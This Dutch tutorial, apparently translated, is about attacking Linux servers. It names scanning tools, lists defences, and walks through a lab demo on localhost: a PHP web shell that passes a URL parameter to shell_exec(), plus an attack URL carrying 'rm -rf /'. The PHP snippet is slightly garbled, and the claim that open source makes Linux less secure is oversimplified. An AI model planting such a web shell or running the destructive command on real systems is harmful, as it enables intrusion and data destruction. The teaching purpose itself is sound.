Linux OS hacken: Hacking with Ubuntu (Commands Tutorial)

Linux is het meest gebruikte serverbesturingssysteem, vooral voor webservers. Het is open source; dit betekent dat iedereen toegang heeft tot de broncode. Dit maakt het minder veilig in vergelijking met andere besturingssystemen, omdat aanvallers de broncode kunnen bestuderen om kwetsbaarheden te vinden. Linux voor Hackers gaat over het misbruiken van deze kwetsbaarheden om ongeoorloofde toegang tot een systeem te krijgen.

In dit artikel laten we u kennismaken met wat Linux is, de kwetsbaarheden in de beveiliging, hacken met Ubuntu en de tegenmaatregelen die u kunt nemen.

Onderwerpen behandeld in deze tutorial

  • Korte notitie over Linux
  • Linux Hacking Tools
  • Hoe Linux hacks te voorkomen
  • Hacking Activiteit: Hack a Linux system using PHP

Quick Note on Linux

Linux is een open source besturingssysteem. Er zijn veel distributies van op Linux gebaseerde besturingssystemen, zoals Redhat, Fedora, en Ubuntu, enz. In tegenstelling tot andere besturingssystemen is Linux minder veilig als het op beveiliging aankomt. Dit komt omdat de broncode vrij beschikbaar is, dus is het gemakkelijk om het te bestuderen op kwetsbaarheden en ze uit te buiten in vergelijking met andere besturingssystemen die niet open source zijn. Linux kan worden gebruikt als een server, desktop, tablet, of mobiel apparaat besturingssysteem.

Linux programma’s kunnen worden bediend met behulp van zowel GUI of commando’s. De Linux commando’s voor Kali Linux hacking zijn effectiever en efficiënter in vergelijking met het gebruik van de GUI. Om deze reden helpt het om basis Linux commando’s te kennen voor hacken.

Raadpleeg deze tutorials https://www.guru99.com/unix-linux-tutorial.html over hoe u aan de slag met Kali Linux hacks.

Linux Hacking Tools

  • Nessus- deze tool kan worden gebruikt voor Ubuntu hack, scan configuratie-instellingen, patches, en netwerken, enz. het kan worden gevonden op https://www.tenable.com/products/nessus
  • NMap. Deze tool kan worden gebruikt om hosts die draaien op de server en de diensten die zij gebruiken te controleren. Het kan ook worden gebruikt om naar poorten te scannen. Het is te vinden op https://nmap.org/
  • SARA – SARA is het acroniem voor Security Auditor’s Research Assistant. Zoals de naam al aangeeft, kan deze tool worden gebruikt om netwerken te controleren op bedreigingen zoals SQL Injection, XSS enz. Het is te vinden op http://www-arc.com/sara/sara.html

De bovenstaande lijst is niet uitputtend; het geeft u een idee van de tools die beschikbaar zijn voor Ubuntu hacking en het hacken van Linux systemen.

Hoe Linux-hacks te voorkomen

Linux-hacking maakt gebruik van de kwetsbaarheden in het besturingssysteem. Een organisatie kan het volgende beleid voeren om zich tegen dergelijke aanvallen te beschermen.

  • Patch management- patches repareren bugs die aanvallers misbruiken om een systeem te compromitteren. Een goed patchbeheerbeleid zorgt ervoor dat u voortdurend relevante patches op uw systeem toepast.
  • Juiste OS-configuratie- andere exploits maken gebruik van de zwakke plekken in de configuratie van de server. Inactieve gebruikersnamen en daemons moeten worden uitgeschakeld. Standaardinstellingen zoals veelgebruikte wachtwoorden voor toepassingen, standaardgebruikersnamen en sommige poortnummers moeten worden gewijzigd.
  • Intrusion Detection System- dergelijke hulpmiddelen kunnen worden gebruikt om ongeoorloofde toegang tot het systeem te detecteren. Sommige tools hebben de mogelijkheid om dergelijke aanvallen te detecteren en te voorkomen.

Hacking Activiteit: Hack a Ubuntu Linux System using PHP

In dit praktijkscenario leren we hoe je met Ubuntu kunt hacken en geven we je basisinformatie over hoe je PHP kunt gebruiken om een Linux te compromitteren. We gaan ons niet richten op een slachtoffer. Als je het wilt uitproberen, kun je LAMPP installeren op je lokale machine.

PHP komt met twee functies die kunnen worden gebruikt om Linux hacking commando’s uit te voeren. Het heeft exec() en shell_exec() functies. De functie exec() retourneert de laatste regel van het commando terwijl de shell_exec() het hele resultaat van het commando als een string retourneert.

Laten we ter demonstratie aannemen dat de aanvaller het volgende bestand naar een webserver wil uploaden.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

HIER,

Het bovenstaande script krijgt het commando uit de GET variabele met de naam cmd. Het commando wordt uitgevoerd met shell_exec() en de resultaten worden teruggestuurd in de browser.

De bovenstaande code kan worden misbruikt met de volgende URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HIER,

  • “…konsole.php?cmd=ls%20-l “wijst de waarde ls -l toe aan de variabele cmd.

Het commando in Ubuntu om de server te hacken zal worden uitgevoerd als

shell_exec('ls -l') ;

Het uitvoeren van de bovenstaande code op een webserver geeft resultaten die lijken op het volgende.

Het bovenstaande commando toont eenvoudigweg de bestanden in de huidige directory en de permissies

Stel dat de aanvaller het volgende commando doorgeeft

rm -rf /

HIER,

  • “rm” verwijdert de bestanden
  • “rf” laat het rm commando in een recursieve modus lopen. Het verwijdert alle mappen en bestanden
  • “/” instrueert het commando om te beginnen met het verwijderen van bestanden vanuit de hoofddirectory

De aanvals-URL zou er ongeveer zo uitzien

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Samenvatting

  • Linux is een populair besturingssysteem voor servers, desktops, tablets en mobiele apparaten.
  • Linux is open source, en de broncode kan door iedereen worden bemachtigd. Dit maakt het gemakkelijk om de kwetsbaarheden te ontdekken. Het is een van de beste OS voor hackers.
  • Basis en networking hacking commando’s in Ubuntu zijn waardevol voor Linux hackers.
  • Kwetsbaarheden zijn een zwakte die kan worden uitgebuit om een systeem te compromitteren.
  • Een goede beveiliging kan helpen om een systeem te beschermen tegen gecompromitteerd te worden door een aanvaller.

Geef een antwoord

Het e-mailadres wordt niet gepubliceerd.